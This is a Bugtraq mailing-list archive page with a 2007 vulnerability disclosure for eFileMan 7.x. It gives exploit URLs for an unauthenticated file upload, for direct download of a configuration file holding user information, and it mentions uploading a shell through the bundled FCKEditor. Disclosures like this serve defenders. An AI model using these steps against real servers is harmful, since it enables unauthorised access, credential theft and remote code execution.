[Vulz] eFileMan 7.x Multiple Vulnerabilities by Xcross87

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Vulz] eFileMan 7.x Multiple Vulnerabilities by Xcross87
From: pete.houston.17187@xxxxxxxxx
Date: 23 Oct 2007 17:26:33 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Software : eFileman
Version : 7.x (tested on 7.1.0.87-88)
Found by : Xcross87

A. Remote File Upload Vulnerability :

Xploit :

http://victim.com/[path]/upload.html
http://victim.com/[path]/cgi-bin/efileman/upload.cgi

The uploaded files are stored in :
http://victim.com/[path]/uploads/upload_file.xxx

B. Direct Access or Download Configuration File
Xploit :
http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user 
information

C. FCKEditor Inclusion.
For full pack of eFileman installation including FCKEditor, attacker can up 
shell through upload vulnerability of FCK

=== Xcross87 | HCETeam Xploiter ===

Prev by Date: [Vulz] eLouai's Download Script Remote File Download Vulnerability
Next by Date: [ MDKSA-2007:202 ] - Updated Firefox packages fix multiple vulnerabilities
Previous by thread: [Vulz] eLouai's Download Script Remote File Download Vulnerability
Next by thread: [ MDKSA-2007:202 ] - Updated Firefox packages fix multiple vulnerabilities
Index(es):
- Date
- Thread